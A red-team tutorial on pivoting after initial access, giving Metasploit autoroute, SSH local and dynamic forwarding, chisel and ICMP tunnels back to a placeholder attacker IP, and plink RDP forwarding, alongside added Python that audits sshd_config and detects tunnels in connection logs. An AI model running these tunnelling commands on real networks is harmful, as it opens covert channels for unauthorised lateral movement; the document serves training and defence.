
Pivoting Commands

Pivoting for Red Teamers

Pivoting in Red Team Operations: A Complete Guide

Introduction

In a real-world red team operation, gaining initial access is just the beginning. The real challenge is pivoting—the ability to move laterally, escalate privileges, and compromise additional systems within the network.

What is Pivoting?

Pivoting is a technique used to route traffic through a compromised host to access internal networks that are not directly reachable.

Types of Pivoting

  • Network Pivoting: Routes network traffic through a compromised host (e.g., SSH Tunneling, Metasploit, ProxyChains).
  • Port Forwarding: Exposes specific ports from an internal machine to the attacker (e.g., SSH Local Port Forwarding).

Step 1: Pivoting Using Metasploit

Setting Up a Pivot via Meterpreter

meterpreter> run autoroute -s 192.168.1.0/24
meterpreter> background
msf> route print

autoroute is run from the Meterpreter prompt before the session is backgrounded; route print at the msf prompt confirms the route was added. From then on, traffic from Metasploit modules destined for 192.168.1.0/24 is routed through the compromised host's session. The operating system's own routing table is not changed, so tools outside Metasploit need the auxiliary/server/socks_proxy module together with ProxyChains.

Step 2: Pivoting with SSH Tunneling

Using Local Port Forwarding

ssh -L 8080:192.168.1.100:80 user@pivot-host

Port 8080 on the attacker machine now reaches port 80 on 192.168.1.100 by way of pivot-host, so the internal web server is available at http://127.0.0.1:8080.

Using Dynamic Port Forwarding (SOCKS Proxy)

ssh -D 9050 user@pivot-host

This opens a SOCKS proxy on 127.0.0.1:9050; tools pointed at it through ProxyChains have their connections relayed out of pivot-host into the internal network.
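The -L and -D tunnels above (and the plink forwarding in Step 4) only work if the pivot host's sshd permits them, so reviewing sshd_config is the matching defensive check. The script below is an added example, not code from the original post: it parses a constructed sshd_config, applies the documented defaults from sshd_config(5), honours sshd's first-occurrence rule and Match-block inheritance, and reports each directive that still permits forwarding, with a permissive file shown beside a hardened one. The group name tunnelusers and the PermitOpen destination are assumptions.

```python
import re

# Defaults from sshd_config(5) for the directives that let sshd act as a pivot. sshd honours
# the first occurrence of a keyword, and Match blocks inherit any value the global scope sets.
DEFAULTS = {"allowtcpforwarding": "yes",   # -L / -D tunnels through this host
            "gatewayports": "no",          # -R listeners reachable from other hosts
            "permittunnel": "no",          # tun(4) forwarding: a full layer-3 pivot
            "allowagentforwarding": "yes", # a forwarded agent can be used to hop onward
            "permitopen": "any"}           # destinations a tunnel may reach
RISKY = {"allowtcpforwarding": {"yes", "all", "remote"}, "gatewayports": {"yes", "clientspecified"},
         "permittunnel": {"yes", "point-to-point", "ethernet"}, "allowagentforwarding": {"yes"}}

def parse_sshd_config(text):
    """Return {scope: {keyword: value}}, scope being 'global' or a Match line."""
    scopes, scope = {"global": {}}, "global"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[ \t=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        key, value = parts[0].lower(), (parts[1].lower() if len(parts) > 1 else "")
        if key == "match":
            scope, scopes[line] = line, {}
        else:
            scopes[scope].setdefault(key, value)      # first occurrence wins
    return scopes

def audit(text):
    """List (scope, directive, effective value) for each setting that permits pivoting."""
    scopes, findings = parse_sshd_config(text), []
    glob = scopes["global"]
    for scope, kv in scopes.items():
        eff = {k: kv.get(k, glob.get(k, d)) for k, d in DEFAULTS.items()}
        findings += [(scope, k, eff[k]) for k, bad in RISKY.items() if eff[k] in bad]
        if eff["allowtcpforwarding"] != "no" and eff["permitopen"] == "any":
            findings.append((scope, "permitopen", "any"))   # forwarding on, destinations unrestricted
    return findings

# Constructed samples: a permissive file beside a hardened one that keeps one scoped exception.
WEAK_CONFIG = "Port 22\nAllowTcpForwarding yes\nGatewayPorts yes\nPermitTunnel yes\n"
HARDENED_CONFIG = """Port 22
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
AllowAgentForwarding no
Match Group tunnelusers
    AllowTcpForwarding local
    PermitOpen 10.0.5.10:443
"""
```

A file that sets nothing at all still yields findings, because AllowTcpForwarding, AllowAgentForwarding and PermitOpen are permissive by default.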

Step 3: Pivoting with Chisel

Setup on Attacker Machine

./chisel server --reverse --port 8080

Setup on Compromised Host

./chisel client <attacker-ip>:8080 R:1080:socks

Step 4: Pivoting with RDP (Remote Desktop Protocol)

plink.exe -ssh -L 3389:192.168.1.100:3389 user@pivot-host

Step 5: Exploiting Firewall Rules with ICMP Tunnel

Start ICMP Server on Attacker Machine

./icmp-server eth0

Start ICMP Client on Compromised Host

./icmp-client <attacker-ip>

How to Defend Against Pivoting Attacks

  • Segment Networks – Isolate DMZ, internal, and user networks.
  • Use Firewalls – Block unnecessary outbound traffic.
  • Monitor SOCKS & Proxy Usage – Detect unusual traffic.
  • Implement EDR Solutions – Detect tunneling and backdoors.
  • Disable Unused Services – Prevent lateral movement.
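The monitoring items above can be turned into a concrete check. The script below is an added example, not part of the original post; it runs over constructed Zeek-style connection records (timestamp, source, destination, protocol, destination port, duration in seconds, packets) and flags an internal host that keeps one long outbound session on a non-web port while fanning out to many internal targets (the shape of a reverse tunnel such as chisel --reverse or ssh -R), and a host streaming a large ICMP volume outward (the ICMP tunnel of Step 5). The thresholds, address ranges and sample records are assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed Zeek-style records: ts src dst proto dport duration_s packets
SAMPLE_LOG = [
    "1700000000 192.168.1.50 203.0.113.10 tcp 8080 3600 9000",  # hour-long outbound session on 8080
    "1700000100 192.168.1.60 203.0.113.20 tcp 443 12 40",       # ordinary HTTPS session
    "1700000200 192.168.1.60 192.168.1.5 tcp 445 3 20",         # a single file-share connection
    "1700000300 192.168.1.70 203.0.113.10 icmp 0 900 2500",     # sustained echo stream, far beyond a ping
]
# While its tunnel is up, 192.168.1.50 touches 24 internal SMB/RDP endpoints in quick succession
SAMPLE_LOG += [f"17000004{i:02d} 192.168.1.50 192.168.1.{i} tcp {445 if i % 2 else 3389} 2 10" for i in range(1, 25)]

INTERNAL = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
WEB_PORTS = {80, 443}   # long sessions here are common and would drown the signal
def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL)

def parse(lines):
    for line in lines:
        ts, src, dst, proto, dport, dur, pkts = line.split()
        yield src, dst, proto, int(dport), float(dur), int(pkts)

def find_pivots(lines, long_conn=600, fanout=10, icmp_pkts=1000):
    """Return {host: [reasons]} for internal hosts whose traffic looks like a pivot."""
    longest_ext = defaultdict(float)  # per host: longest non-web TCP session to an external address
    targets = defaultdict(set)        # per host: distinct internal (dst, port) pairs contacted
    icmp = defaultdict(int)           # per host: ICMP packets sent to external addresses
    for src, dst, proto, dport, dur, pkts in parse(lines):
        if not is_internal(src):
            continue
        if is_internal(dst):
            targets[src].add((dst, dport))
        elif proto == "icmp":
            icmp[src] += pkts
        elif proto == "tcp" and dport not in WEB_PORTS:
            longest_ext[src] = max(longest_ext[src], dur)
    findings = {}
    for h in set(longest_ext) | set(targets) | set(icmp):
        reasons = []
        # A reverse tunnel is one long outbound session plus internal fan-out from the same host
        if longest_ext[h] >= long_conn and len(targets[h]) >= fanout:
            reasons.append(f"{longest_ext[h]:.0f}s external session, fan-out to {len(targets[h])} internal targets")
        if icmp[h] >= icmp_pkts:
            reasons.append(f"{icmp[h]} ICMP packets to external hosts (possible ICMP tunnel)")
        if reasons:
            findings[h] = reasons
    return findings
```

The host with a normal HTTPS session and one file-share connection is not reported, which is the point of requiring both indicators together rather than alerting on any long connection.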

Conclusion

Pivoting is a critical skill for red teamers, allowing attackers to move deeper into a network after initial access.

⚠️ Reminder: These techniques should only be used for legal penetration testing and red team assessments.

The above commands can be automated with a custom script.
